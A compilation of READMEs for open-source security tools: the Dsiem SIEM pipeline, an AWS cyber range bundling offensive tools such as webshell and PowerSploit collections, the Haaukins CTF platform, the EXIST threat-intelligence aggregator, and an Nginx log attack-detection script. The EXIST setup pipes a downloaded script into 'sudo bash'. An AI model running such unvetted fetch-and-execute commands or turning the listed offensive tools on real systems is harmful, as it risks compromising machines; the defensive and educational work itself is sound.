    2. Dsiem uses a special purpose Logstash config file to clone incoming events from log sources right after Logstash has finished parsing them. Through the same config file, the cloned event is used (independently of the original event) to collect Dsiem's required fields like Title, Source IP, Destination IP, and so on.
    3. The output of the above step is called a Normalized Event because it represents logs from multiple different sources in a single format with a set of common fields. Those events are then sent to Dsiem through the Logstash HTTP output plugin, and to Elasticsearch under the index name pattern siem_events-*.
    4. Dsiem correlates incoming normalized events based on the configured directive rules, performs threat intel and vulnerability lookups, and then generates an alarm if the rule conditions are met. The alarm is then written to a local log file, which is harvested by a local Filebeat configured to send its content to Logstash.
    5. At the Logstash end, there's another special Dsiem config file that reads those submitted alarms and pushes them to the final SIEM alarm index in Elasticsearch.
    The final result of the above processes is that now we can watch for new alarms and updates to an existing one just by monitoring a single Elasticsearch index.
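    As a rough illustration of steps 2-3, the Logstash side could combine the http and elasticsearch output plugins along these lines (the Dsiem address, port, and endpoint here are assumptions for the sketch; the project ships ready-made config files that should be used instead):
    output {
      # send the normalized event to a Dsiem frontend (address assumed)
      http {
        url => "http://dsiem:8080/events"
        http_method => "post"
        format => "json"
      }
      # and index it in Elasticsearch under the siem_events-* pattern
      elasticsearch {
        hosts => ["elasticsearch:9200"]
        index => "siem_events-%{+YYYY.MM.dd}"
      }
    }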

    Installation
    You can use Docker Compose or the release binaries to install Dsiem. Refer to the Installation Guide for details.
    Alternatively, there's also a Docker Compose or virtual machine-based demo environment that you can use to evaluate all Dsiem integration from one simple web interface.

    Documentation
    Currently available docs are located here.


    CyberRange - The Open-Source AWS Cyber Range


    This CyberRange project represents the first open-source Cyber Range blueprint in the world.
    This project provides a bootstrap framework for complete offensive, defensive, reverse engineering, & security intelligence tooling in a private research lab using the AWS Cloud.
    This project contains vulnerable systems and a toolkit of the most powerful open-source / community edition tools known to Penetration testers.
    It simply provides a researcher with a disposable offensive / defensive AWS-based environment in less than 5 minutes.



    Get Started
    To gain access you must send me your AWS account number so I can share the 30+ Amazon Machine Images (AMIs).
    Use my secure FormAssembly form -> CyberRange Sign-Up Form
    Then - Read the Getting Started Guide

    Range History

    Release Notes:
    view the changelog
    v2 - released on Sept 6, 2019. v2 is simply a collection of the best-in-class tools, most emerging toolsets, and bootstrap frameworks to create an integrated solution capable of enormous growth.
     features include: makefile, inspec tests, detection lab integration, commandoVM v2, 
    kali 2019.4 w/ the following opensource github tools: CyberRange, DetectionLab, IntruderPayloads,
    aws-credential-compromise-detection, aws-nuke, blast-radius, cloudgoat, cloudmapper, packer-windows,
    pacu, security-monkey-terraform, security_monkey, sites-using-cloudflare,
    net-creds, Reconnoitre, shell_generator.sh, msploitego, awesome-nodejs-pentest,
    cloudgoat, hammer, joomscan, learning-tools, LetsMapYourNetwork,
    php-webshells, PowerHub, PowerSploit, snmpwn, vulhub, ScoutSuite, prowler,
    pacbot, terraform-aws-secure-baseline, gitleaks, my-arsenal-of-aws-security-tools

    Range Technology
    CyberRange combines best practices with emerging technologies.
    • Amazon Web Services
    • Kali
    • Nessus
    • Commando-VM - a windows-based penetration testing VM
    • Terraform
    • Open-sourced vulnerable VMs (see Asset Inventory)
    • Using a CI/CD tool (CircleCI) to verify builds
    • Docker / docker-compose
    • Metasploitable 2/3 & other open-source vulnerable VMs on VulnHub
    • DetectionLab
    • Inspec - to test the state of your environment, application, system, processes, configurations, etc.
    • Plus many more things to set up, configure, and experiment with.

    Domains of knowledge
    This open-source research lab provides a bootstrap learning platform for Technologists studying any one of the "Big-3" technology skills.
    1. Cyber Security
    2. Cloud Computing
    3. DevOps
    This project supports 7 gigantically broad domains of technical knowledge.
    1. Offensive Security
    2. SecDevOps
    3. Architecture & Engineering
    4. Vulnerability, Change, & Configuration Management
    5. Quality Assurance
    6. Auditing - Processing, Systems, Applications
    7. Development - Infrastructure / Web Applications

    Mission Statement
    The ultimate expectation is to emulate the quality, format, and presentation of the Syracuse University Cyber SEED Labs, while creating strategic hubs of Cyber Security Center-of-Excellence partnerships where the gap between enterprise experience and academic learning is addressed by focusing training paths on people, products, and process.

    SEED Funding / Training Programs
    AWS Educate - Free cloud training for students w/ edu address
    AWS EdStart - $500 in AWS Credits for startup's
    Program Solicitation NSF 17-573 aims to make advancements in informal STEM learning.
    Graduate Research Fellowship Program (GRFP) - SU's Master of Cyber Security program requires a bit more funding; this is open source - win, win, win.

    America's Seed Fund - a creative outlet

    Credits
    • Chris Long - Detection Lab
    • Omar Santos - websploit & docker scripts
    • FireEye - CommandoVM & FlareVM
    • All Github projects
    • Kali Maintainers
    • Tenable Nessus Engineers
    • This project is a fork of a well-architected terraform AWS framework -> fedekau/terraform-with-circleci-example


    Haaukins - A Highly Accessible And Automated Virtualization Platform For Security Education


    Haaukins is a highly accessible and automated virtualization platform for security education. It has three main components (Docker, VirtualBox and Golang), with the communication and orchestration between the components managed using the Go programming language. The main reason for using Go to manage and deploy the Haaukins platform is Go's easy concurrency and parallelism mechanisms. To get more insight into the architecture of Haaukins, visit the architecture page.
    Our primary aim is to involve anyone who desires to learn the capture-the-flag concept in cyber security, a widely accepted approach to learning how to find vulnerabilities in a system. Unlike existing platforms, Haaukins provides its own virtualized environment with operating systems designed for finding vulnerabilities.

    Prerequisites
    The following dependencies are required and must be installed separately in order to run daemon in your local environment.
    • Linux
    • Docker
    • Go 1.13+
    There are no prerequisites for installing the client in your environment.
    Note: Linux can be used in virtualized environment as well.

    Installation
    To install the daemon or client of Haaukins there are some options; ready-to-use binary files are available on the releases page.
    For more information about the installation process, check out the following pages:
    • Installation for client
    • Configuration for daemon
      • There are some configuration files to configure the daemon; those configuration files should be in the same directory as the binary file that you have just downloaded from the releases page.
      • If you want to try the daemon on your local computer with a pre-configured Vagrant file, check out this repo for more information.

    Getting Dependencies
    The Haaukins platform has used Go modules since version 1.6.4, hence it is quite easy to manage dependencies; you just need to run go mod download.

    Testing
    Make sure that you are in the $GOPATH/src/github.com/aau-network-security/haaukins/ directory. To run all test files, the following command can be used:
    go test -v -short ./...

    Re-compile proto
    Haaukins platform uses gRPC on communication of client and daemon, so after updating the protocol buffer specification (i.e. daemon/proto/daemon.proto), corresponding golang code generation is done by doing the following:
    cd $GOPATH/src/github.com/aau-network-security/haaukins/daemon/
    protoc -I proto/ proto/daemon.proto --go_out=plugins=grpc:proto

    Version release
    In order to release a new version, run the script/release/release.go script as follows (choose depending on type of release):
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go major
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go minor
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go patch
    The script will do the following:
    • Bump the version in VERSION and commit to git
    • Tag the current HEAD with the new version
    • Create new branch(es), which depends on the type of release.
    • Push to git
    Travis automatically creates a release on GitHub and deploys it on the server.
    Note: by default the script uses the ~/.ssh/id_rsa key to push to GitHub. You can override this settings by the HKN_RELEASE_PEMFILE env var.

    Credits


    EXIST - Web Application For Aggregating And Analyzing Cyber Threat Intelligence


    EXIST is a web application for aggregating and analyzing CTI (cyber threat intelligence).
    EXIST is built with the following software:
    • Python 3.5.4
    • Django 1.11.22

    Concept
    EXIST is a web application for aggregating CTI to help security operators investigate incidents based on related indicators.
    EXIST automatically fetches data from several CTI services and Twitter via their APIs and feeds. You can cross-search indicators via the web interface and the API.
    If you have servers logging the network behavior of clients (e.g., logs of DNS and HTTP proxy servers), you will be able to analyze those logs by correlating them with data on EXIST. If you implement programs using the API, you can realize an automated CTI-driven security operations center.


    Use Cases

    Case1: Investigate domain detected by IDS
    Just type domain in the search form.


    Case2: Access the malicious URL on behalf of the user and acquire the display image of the browser and the contents to be downloaded
    Just type url in the search form.


    Case3: Monitor cyber threats
    Just add keywords in the Threat Hunter or Twitter Hunter.


    Features

    Tracker
    Tracker automatically collects data feeds from several CTI services.
    • Threat Tracker
    • Reputation Tracker
    • Twitter Tracker
    • Exploit Tracker
    • News Tracker
    • Vuln Tracker

    Hunter
    Hunter enables us to set queries for gathering data from several CTI services and Twitter.
    • Twitter Hunter
    • Threat Hunter
    • News Hunter

    Lookup
    Lookup retrieves information related to specific information (e.g. IP address, domain) from several internet services (e.g. whois).
    • IP Address
    • Domain
    • URL
    • File Hash

    Web API
    Provides data stored in the EXIST database via a Web API.
    • reputation
    • twitter
    • exploit
    • threatEvent
    • threatAttribute
    • news
    • vuln

    Getting started
    The following assumes a CentOS 7 or Ubuntu 18.04 LTS environment. Please proceed at your own risk when deploying to other environments.

    Install python modules
    $ sudo pip install -r requirements.txt

    Install MariaDB
    • CentOS 7
    $ curl -sS https://downloads.mariadb.com/MariaDB/mariadb_repo_setup | sudo bash
    $ sudo yum install MariaDB-server MariaDB-client
    • Ubuntu 18.04 LTS
    $ sudo apt install mariadb-server mariadb-client

    Run database
    $ sudo systemctl start mariadb
    $ sudo systemctl enable mariadb

    Database setting
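    A minimal sketch for creating the EXIST database and user might look like the following (database name, user name, and password are assumptions; match them to your Django settings):
    $ mysql -u root -p
    MariaDB [(none)]> CREATE DATABASE intelligence CHARACTER SET utf8;
    MariaDB [(none)]> CREATE USER 'exist'@'localhost' IDENTIFIED BY 'YOUR_PASSWORD';
    MariaDB [(none)]> GRANT ALL PRIVILEGES ON intelligence.* TO 'exist'@'localhost';
    MariaDB [(none)]> FLUSH PRIVILEGES;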

    Migrate database
    $ python manage.py makemigrations exploit reputation threat threat_hunter twitter twitter_hunter news news_hunter vuln
    $ python manage.py migrate

    Install Redis server
    Reputation tracker uses redis as the Celery cache server backend.
    • CentOS 7
    $ sudo yum install redis
    $ sudo systemctl start redis
    $ sudo systemctl enable redis
    • Ubuntu 18.04 LTS
    $ sudo apt install redis-server
    $ sudo systemctl start redis-server
    $ sudo systemctl enable redis-server

    Setup Celery
    Reputation tracker uses Celery as an asynchronous task job queue.
    • Create a celery config. I recommend that the config is set on the following paths:
      • CentOS 7: /etc/sysconfig/celery
      • Ubuntu 18.04 LTS: /etc/celery.conf
    # Name of nodes to start
    # here we have a single node
    CELERYD_NODES="w1"
    # or we could have three nodes:
    #CELERYD_NODES="w1 w2 w3"

    # Absolute or relative path to the 'celery' command:
    CELERY_BIN="/path/to/your/celery"

    # App instance to use
    # comment out this line if you don't use an app
    CELERY_APP="intelligence"
    # or fully qualified:
    #CELERY_APP="proj.tasks:app"

    # How to call manage.py
    CELERYD_MULTI="multi"

    # Extra command-line arguments to the worker
    CELERYD_OPTS="--time-limit=300 --concurrency=8"

    # - %n will be replaced with the first part of the nodename.
    # - %I will be replaced with the current child process index
    # and is important when using the prefork pool to avoid race conditions.
    CELERYD_PID_FILE="/var/run/celery/%n.pid"
    CELERYD_LOG_FILE="/var/log/celery/%n%I.log"
    CELERYD_LOG_LEVEL="INFO"
    • Create a celery service management script on /etc/systemd/system/celery.service. Also, you must set your celery config path to EnvironmentFile.
    [Unit]
    Description=Celery Service
    After=network.target

    [Service]
    Type=forking
    User=YOUR_USER
    Group=YOUR_GROUP
    EnvironmentFile=/etc/sysconfig/celery
    WorkingDirectory=/path/to/your/exist
    ExecStart=/bin/sh -c '${CELERY_BIN} multi start ${CELERYD_NODES} \
    -A ${CELERY_APP} --pidfile=${CELERYD_PID_FILE} \
    --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
    ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait ${CELERYD_NODES} \
    --pidfile=${CELERYD_PID_FILE}'
    ExecReload=/bin/sh -c '${CELERY_BIN} multi restart ${CELERYD_NODES} \
    -A ${CELERY_APP} --pidfile=${CELERYD_PID_FILE} \
    --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'

    [Install]
    WantedBy=multi-user.target
    • Create Celery log and run directories.
    $ sudo mkdir /var/log/celery; sudo chown YOUR_USER:YOUR_GROUP /var/log/celery
    $ sudo mkdir /var/run/celery; sudo chown YOUR_USER:YOUR_GROUP /var/run/celery
    • Create a configuration file in /etc/tmpfiles.d/exist.conf
    #Type  Path               Mode  UID        GID         Age  Argument
    d /var/run/celery 0755 YOUR_USER YOUR_GROUP -
    • Run Celery
    $ sudo systemctl start celery.service
    $ sudo systemctl enable celery.service

    Run web server
    $ python manage.py runserver 0.0.0.0:8000
• Access http://[YourWebServer]:8000 with your browser.
    • WebAPI: http://[YourWebServer]:8000/api/
Note: I recommend using Nginx and uWSGI when running in a production environment; a rough sketch follows.
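As an illustration only, a minimal uWSGI configuration for such a setup might look like the following. The module name intelligence.wsgi and the paths are assumptions inferred from the Celery app name above, not settings confirmed by this document:
[uwsgi]
# Project directory (assumption: adjust to your EXIST checkout)
chdir = /path/to/your/exist
# WSGI module (assumption: the Django project appears to be named 'intelligence')
module = intelligence.wsgi:application
# Listen locally; put Nginx in front as a reverse proxy
http = 127.0.0.1:8000
master = true
processes = 4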

    Collect feed
The scripts that insert feeds into the database live at scripts/insert2db/*/insert2db.py.

    Configure insert2db
• The configuration file is scripts/insert2db/conf/insert2db.conf. Create it by referring to insert2db.conf.template.
• If you use MISP, write the MISP URL and API key to insert2db.conf.
• If you use Malshare, write your API key to insert2db.conf.
• Create your Twitter API account at https://developer.twitter.com/ for tracking with EXIST.
• Create an App for EXIST.
• Get the Consumer API key (CA), Consumer API secret key (CS), Access token (AT), and Access token secret (AS).
• Write the CA, CS, AT, and AS to insert2db.conf.

    Run scripts
    $ python scripts/insert2db/reputation/insert2db.py
    $ python scripts/insert2db/twitter/insert2db.py
    $ python scripts/insert2db/exploit/insert2db.py
    $ python scripts/insert2db/threat/insert2db.py
    $ python scripts/insert2db/news/insert2db.py
    $ python scripts/insert2db/vuln/insert2db.py
Note: To automate information collection, add these scripts to your cron; a sketch follows.
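For example, a crontab sketch that runs the collectors hourly (the installation path /opt/exist and the schedule are assumptions; adjust both to your environment):
# m h dom mon dow command
0 * * * * cd /opt/exist && python scripts/insert2db/reputation/insert2db.py
0 * * * * cd /opt/exist && python scripts/insert2db/twitter/insert2db.py
# ...and likewise for the exploit, threat, news, and vuln scripts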

    Setting hunter

    Twitter Hunter
Twitter Hunter detects tweets that contain specific keywords or come from specific user IDs, and can optionally send notifications to Slack.
• The configuration file is scripts/hunter/conf/hunter.conf. Create it by referring to hunter.conf.template.
• If you use Slack, write your Slack token to hunter.conf.
• Create your Twitter API account at https://developer.twitter.com/.
• Create 18 Apps for EXIST.
• For each app, get the Consumer API key (CA), Consumer API secret key (CS), Access token (AT), and Access token secret (AS).
• Write the CA, CS, AT, and AS values to the auth-hunter[00-18] entries in hunter.conf.
• Make scripts/hunter/twitter/tw_watchhunter.py run every minute using cron so Twitter Hunter stays persistent (a crontab sketch follows the Threat Hunter section).

    Threat Hunter
Threat Hunter detects threat events that contain specific keywords, and can optionally send notifications to Slack.
• The configuration file is scripts/hunter/conf/hunter.conf. Create it by referring to hunter.conf.template.
• If you use Slack, write your Slack token to hunter.conf.
• Make scripts/hunter/threat/th_watchhunter.py run every minute using cron so Threat Hunter stays persistent (see the sketch below).
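A crontab sketch covering both hunters (the /opt/exist installation path is an assumption):
* * * * * cd /opt/exist && python scripts/hunter/twitter/tw_watchhunter.py
* * * * * cd /opt/exist && python scripts/hunter/threat/th_watchhunter.py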

Other required tools and settings

    VirusTotal API
EXIST uses the VirusTotal API.
• Create your VirusTotal account.
• Write your API key to conf/vt.conf.
Note: You get more information if you have a private API key.

    GeoIP DB
The Lookup IP / Domain feature uses MaxMind's GeoLite2 database.

    wkhtmltopdf and Xvfb
The Lookup URL feature uses wkhtmltopdf and Xvfb.
• CentOS 7
$ sudo yum install xorg-x11-server-Xvfb
• Ubuntu 18.04 LTS
$ sudo apt install wkhtmltopdf xvfb
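As a quick sanity check that the two work together, you can render a page headlessly (the URL and output path here are placeholders):
$ xvfb-run -a wkhtmltopdf https://example.com /tmp/example.pdf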

    Flush old data
• The configuration file is scripts/url/url.conf. Create it by referring to url.conf.template.
• Make scripts/url/delete_webdata.sh run every day using cron to flush old Lookup URL data.
• Make scripts/url/delete_oldtaskresult.sh run every day using cron to flush old Celery task results (see the sketch below).
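A daily crontab sketch for both cleanup scripts (the time of day and the /opt/exist path are assumptions):
0 3 * * * /opt/exist/scripts/url/delete_webdata.sh
0 3 * * * /opt/exist/scripts/url/delete_oldtaskresult.sh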


    Nginx Log Check - Nginx Log Security Analysis Script


    Features
• Top 20 requesting IP addresses (statistics)
• SQL injection analysis
• Scanner alert analysis
• Exploit detection
• Sensitive path access detection
• File inclusion attack detection
• Webshell detection
• Top 20 URLs by response length
• Detection of rarely accessed script files
• Detection of script files returning 302 redirects

    Usage

Set the report output path: outfile
Set the directory of logs to analyze: access_dir
Set the log file name: access_log
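For example, the variables at the top of the script might be set like this (the values are placeholders for your environment):
outfile=/tmp/nginx_report      # where the report is saved
access_dir=/var/log/nginx      # directory containing the logs to analyze
access_log=access.log          # log file name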

$ ./nginx_check.sh

